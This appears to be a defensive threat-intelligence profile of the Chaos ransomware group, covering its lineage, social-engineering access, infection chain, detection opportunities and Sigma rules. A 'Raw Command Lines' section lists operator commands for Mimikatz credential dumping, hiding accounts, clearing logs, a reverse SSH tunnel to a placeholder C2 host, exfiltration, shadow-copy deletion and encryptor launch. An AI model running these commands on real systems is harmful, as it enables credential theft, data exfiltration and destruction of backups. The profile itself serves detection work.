Chaos - ShroudCloud

# Chaos Ransomware (BlackSuit Successor / ex-Royal) **Type:** Ransomware-as-a-Service (RaaS) - Open Affiliate Model **Also tracked as:** Ex-BlackSuit operators (Cisco Talos), ex-Royal/Conti lineage **First observed:** February 2025 (RAMP forum recruitment), first leak site victim March 2025 **Status:** Active - 42 named leak site victims as of late March 2026. Steady cadence, not a volume leader. Opportunistic targeting with big-game hunting posture. Triple extortion model (data leak + encryption + DDoS threat). --- ## Threat Overview Open RaaS operated by suspected former BlackSuit/Royal operators (Conti lineage). Emerged after DOJ seized BlackSuit infrastructure on July 24, 2025. Actively recruiting affiliates on RAMP. Cross-platform encryptor: Windows, ESXi, Linux, NAS. Encryption: ECDH (Curve25519) + AES-256 with per-file unique keys and operator-controlled master key. **Double/triple extortion** GoodSync exfil (renamed `wininit.exe`) followed by encryption via configurable encryptor (`/lkey`, `/encrypt_step`, `/work_mode` params). Leak site on Tor. DDoS threat against non-payers (Recorded Future). | Field | Value | |---|---| | Ransom note | `README.chaos.txt` (Windows) / `readme.chaos.txt` (Linux/ESXi) | | File extension | `.chaos` | | Contact | Tor leak site negotiation portal | | Avg ransom demand | ~$300K (Cisco Talos) | | Top targets (geo) | US (30), UK, New Zealand, India | | Top targets (sector) | Technology (12), Financial Services (5), Manufacturing (3), Business Services (3), Transportation (2) | | Encryption | ECDH Curve25519 + AES-256, selective partial-file encryption, per-file keys | --- ## Activity Standing Not a top-5 operation by volume. Q1 2026 is dominated by **Qilin** (~1,302 trailing-12mo), **Akira**, LockBit5, and SafePay. Chaos's 42 named victims place it in the mid-tier, but the **BlackSuit/Royal/Conti pedigree** and cross-platform capability make it more dangerous than victim count suggests. The group's adoption of triple extortion (adding DDoS threats) signals operational maturity beyond typical spray-and-pray RaaS. Cisco Talos assesses with moderate confidence that Chaos operators are former BlackSuit/Royal members, based on: encryption methodology overlap, ransom note structure similarity, and shared toolset preferences. --- ## Initial Access **Primary:** Social engineering - email spam flood + voice phishing (vishing). Victim receives mass spam, calls attacker-controlled "IT helpdesk," attacker impersonates IT security, directs victim to launch **Microsoft Quick Assist** and connect to attacker's session. Not exploit-based. Human-operated from minute one. **Secondary:** Opportunistic exploitation of unpatched edge devices, compromised RDP credentials. IAB-purchased access likely given RAMP presence and open affiliate model. **Scale:** Opportunistic, no vertical focus. Predominantly US targets (71% of known victims). --- ## Infection Chain ### Step 1 - Initial Access: Email Spam Flood + Vishing T1566.004, T1204.002 | Operator Victim flooded with spam emails. Encouraged to call attacker-controlled number. Attacker impersonates IT security representative, instructs victim to launch **Microsoft Quick Assist** and connect to attacker's remote session. Immediate hands-on-keyboard access. No exploit, no payload delivery - pure social engineering. > **Detection Opportunity:** Monitor for Quick Assist spawning child processes associated with remote management tool installers or command-line interpreters. This is a strong social engineering indicator - Quick Assist should not be launching MSI installers or scripting engines in normal use. ### Step 2 - Persistence: RMM Tool Deployment T1219 | Operator Installs multiple RMM tools for redundant persistence: **AnyDesk**, **ScreenConnect**, **OptiTune**, **Syncro RMM**, **Splashtop Streamer**. Multiple tools ensures access survives if one is detected and removed. Also sets up **reverse SSH tunnel** over port 443 for encrypted C2. > **Detection Opportunity:** Alert on rapid installation of multiple remote management tools within a short window on the same host. Also monitor for outbound SSH tunnels (particularly reverse tunnels) on non-standard ports or to unfamiliar infrastructure. > > See rule(s): [[edr-win-persist-rmm-deployment]] | [[edr-win-c2-reverse-tunneling]] ### Step 3 - Reconnaissance T1033, T1016, T1018, T1069.002 | Operator Post-compromise discovery: network config, domain controller enumeration, trust relationships, logged-in users, running processes, reverse DNS lookups. **ldapsearch** executed remotely via reverse SSH tunnel to dump AD user details to text file. > **Detection Opportunity:** Watch for domain trust enumeration commands (`nltest /dclist`), privileged group enumeration (`net group "Domain Admins"`), and LDAP queries originating from non-domain-controller hosts - especially when these occur in rapid succession from the same source. > > See rule(s): [[edr-win-disc-net-priv-group-enum]] | [[edr-win-disc-nltest-domain-trusts]] ### Step 4 - Credential Access T1003.001, T1558.003, T1134.001 | Operator **Mimikatz** for LSASS credential harvesting. **Kerberoasting** to capture service account TGS tickets for offline cracking. Token impersonation for privilege escalation - modifies security descriptors, impersonates high-privilege security contexts to bypass file access restrictions. Password resets of enumerated domain accounts via `net.exe` (all set to same password). > **Detection Opportunity:** Monitor for LSASS memory access patterns consistent with credential dumping (minidump creation, direct memory reads). Alert on Kerberoasting behavior - high-volume TGS requests for service accounts from a single host. Watch for bulk `net user /domain` password resets in rapid succession. ### Step 5 - Defense Evasion T1036.005, T1070.001, T1562.001 | Operator Process masquerading: ransomware binary disguised as `svchost.exe`, `explorer.exe`, or random strings. GoodSync exfil tool renamed to `wininit.exe`. Deletes **PowerShell event logs** to evade security controls. Attempts to uninstall security/MFA applications via WMIC. Registry modification to **hide user accounts** from Windows login screen (account still usable via RDP/runas). > **Detection Opportunity:** Flag processes where the binary name matches a known Windows system process but the image path is outside the expected directory (e.g., `svchost.exe` running from a temp folder). Monitor for `wevtutil cl` targeting PowerShell logs specifically. Alert on registry writes to `SpecialAccounts\Userlist` with a DWORD value of 0 - this hides accounts from the login screen and is almost exclusively malicious. > > See rule: [[edr-win-def-defender-tampering]] ### Step 6 - Lateral Movement T1021.001, T1021.002, T1047 | Operator RDP using harvested/reset credentials. Impacket for SMB/WMI command execution. Multiple RMM tools provide GUI access across environment. Hidden accounts used for RDP without login screen visibility. > **Detection Opportunity:** Monitor for Impacket-style SMB/WMI remote execution patterns, PsExec-like service creation on remote hosts, and RDP logins from accounts that were recently created or had passwords reset in bulk. > > See rule: [[edr-win-lat-impacket-wmiexec]] ### Step 7 - Exfiltration T1567, T1036.005 | Operator **GoodSync** file synchronization tool renamed to `wininit.exe`. Filters out large/uncommon file types to avoid detection. Exfils sensitive data before encryption to support double extortion. > **Detection Opportunity:** Detect renamed file synchronization tools by comparing the process display name or internal metadata against the executable file name. A process reporting as "GoodSync" but running as `wininit.exe` is a strong indicator. Also watch for file sync tools filtering for high-value document types (`.docx`, `.xlsx`, `.pdf`, `.pst`) to external destinations. ### Step 8 - Impact (Encryption) T1486, T1490 | Malware Configurable encryptor deployed with operator parameters: `/lkey` (32-byte master key), `/encrypt_step` (0-100, selective partial-file encryption), `/work_mode` (local/network/local_network). ECDH Curve25519 + AES-256, per-file unique keys. Shadow copy deletion via `vssadmin`, `wmic`, `wbadmin`, `bcdedit`. Extension: `.chaos`. Ransom note: `README.chaos.txt`. Anti-analysis: anti-debug, anti-VM, anti-sandbox multi-layer evasion. Self-protection: `-delete` parameter triggers batch script loop to restore/re-execute if admin removes binary. > **Detection Opportunity:** Alert on system recovery inhibition commands - `vssadmin delete shadows`, `bcdedit` boot policy modifications, `wbadmin delete catalog` - especially when multiple commands execute in rapid sequence. Monitor for processes with command-line parameters matching the `/lkey:` `/encrypt_step:` `/work_mode:` pattern. Watch for batch script loops that attempt to restore or re-execute a binary after deletion. > > See rule: [[edr-win-impact-inhibit-recovery]] --- ## Raw Command Lines Observed operator commands from Cisco Talos IR engagements and vendor reporting. `[R]` = reconstructed from described behavior. **Reconnaissance** ``` whoami ipconfig /all nltest /dclist: net group "Domain Admins" /domain net user /domain tasklist nslookup <TARGET_IP> ldapsearch -x -H ldap://<DC_IP> -b "dc=<DOMAIN>,dc=com" -D "<USER>@<DOMAIN>" -w <PASSWORD> "(objectClass=user)" > users.txt [R] ``` **Credential access** ``` sekurlsa::logonpasswords lsadump::sam privilege::debug net user <USERNAME> <NEWPASSWORD> /domain ``` **Account hiding** ``` reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <USERNAME> /t REG_DWORD /d 0 /f ``` **RMM tool installation** ``` msiexec.exe /i AnyDesk.msi /quiet [R] msiexec.exe /i ScreenConnect.ClientSetup.msi /quiet [R] ``` **Reverse SSH tunnel** ``` ssh -R 443:<LOCAL_IP>:22 <C2_USER>@<C2_IP> -fN [R] ``` **Anti-forensics** ``` wevtutil cl "Windows PowerShell" [R] wevtutil cl "Microsoft-Windows-PowerShell/Operational" [R] wmic product where "name like '%<SECURITY_APP>%'" call uninstall /nointeractive [R] ``` **Exfiltration (GoodSync masquerading)** ``` wininit.exe sync "<SOURCE_PATH>" "<DEST_PATH>" --include "*.docx" --include "*.xlsx" --include "*.pdf" --include "*.pst" [R] ``` **Shadow copy deletion** ``` vssadmin.exe delete shadows /all /quiet wmic shadowcopy delete bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe /set {default} recoveryenabled no wbadmin.exe delete catalog -quiet ``` **Ransomware execution** ``` Encryptor.exe /lkey:"<32_BYTE_KEY>" /encrypt_step:50 /work_mode:local_network ``` --- ## Intelligence Gaps - **Affiliate diversity unknown** - Open RaaS on RAMP - TTPs may diverge significantly across affiliates. Talos reporting reflects one observed operator playbook. - **ESXi/Linux encryptor underdocumented** - Cross-platform capability confirmed but no public IR report with Linux/ESXi-specific TTPs or commands. - **DDoS capability unverified** - Recorded Future reports DDoS as third extortion lever, but no public incident confirms actual DDoS execution. - **C2 infrastructure opaque** - Reverse SSH tunnels and RMM tools are the observed C2 channels. No custom C2 framework identified. - **Overlap with Trinity of Chaos unclear** - "Trinity of Chaos" (LAPSUS$/ShinyHunters/Scattered Spider alliance) is a separate entity. Any operational overlap with the Chaos RaaS is unconfirmed. - **Distinction from 2021 Chaos builder** - The 2021 Chaos ransomware builder (Ryuk .NET clone that evolved from wiper to real encryptor) is a completely separate lineage. The 2025 Chaos RaaS reuses only the name. Vendors have confirmed no code-level connection. --- ## Confidence Assessment | Claim | Confidence | Evidence | Flips if... | |---|---|---|---| | BlackSuit/Royal lineage | MEDIUM | Talos "moderate confidence," encryption overlap, note structure, toolset similarity | Code analysis proves independent dev | | Conti lineage (via Royal to BlackSuit) | MEDIUM | Transitive - Royal = Conti offshoot, BlackSuit = Royal rebrand | BlackSuit operators were independent affiliates | | Distinct from 2021 Chaos builder | HIGH | Multiple vendors confirm, no code overlap, different encryption (ECDH+AES vs .NET/Ryuk clone) | Code reuse discovered | | Cross-platform (Win/ESXi/Linux/NAS) | HIGH | RAMP advertisements, vendor confirmation | Marketing only, no Linux samples analyzed | | Triple extortion (data + encrypt + DDoS) | MEDIUM | Recorded Future reporting, Talos negotiation obs | DDoS threat is bluff, never executed | | RAMP-based recruitment | HIGH | Direct forum observation by multiple vendors | Forum post is honeypot or impersonation | --- ## Detections Sigma rules applicable to this threat: | Rule ID | Description | |---|---| | [[edr-win-disc-net-priv-group-enum]] | Privileged Domain Group Enumeration via Net | | [[edr-win-disc-nltest-domain-trusts]] | Domain Trust Enumeration via Nltest | | [[edr-win-disc-netscan-deployment]] | SoftPerfect Network Scanner Execution | | [[edr-win-cred-browser-esentutl]] | Browser Credential Theft via Esentutl | | [[edr-win-lat-impacket-wmiexec]] | Impacket WmiExec Lateral Movement | | [[edr-win-impact-inhibit-recovery]] | System Recovery Inhibition | | [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell | | [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution | | [[edr-win-persist-rmm-deployment]] | Unauthorized RMM Tool Deployment | --- ## Key Publications 1. [Cisco Talos - Unmasking the new Chaos RaaS group attacks](https://blog.talosintelligence.com/new-chaos-ransomware/) (Jul 2025) - Primary technical reference. IR-based TTPs, encryption analysis, social engineering chain. 2. [ExtraHop - CHAOS in a BLACKSUIT: Triple Extortion Ransomware](https://www.extrahop.com/blog/chaos-in-a-blacksuit-triple-extortion-ransomware) (2025) - BlackSuit succession, triple extortion model, network detection perspective. 3. [FortiGuard Labs - Evolution of Chaos Ransomware](https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous) (2025) - C++ variant analysis (NOTE: covers 2021 Chaos builder evolution, not 2025 RaaS). 4. [Ransomware.live - Chaos Tracker](https://www.ransomware.live/group/chaos) (ongoing) - 42 victims, sector/geo breakdown. 5. [ANY.RUN - Chaos Ransomware Analysis](https://any.run/malware-trends/chaos/) (ongoing) - Sandbox analysis, behavioral indicators. 6. [Cyble - 10 New Ransomware Groups of 2025](https://cyble.com/knowledge-hub/10-new-ransomware-groups-of-2025-threat-trend-2026/) (2025) - Chaos in broader RaaS landscape context.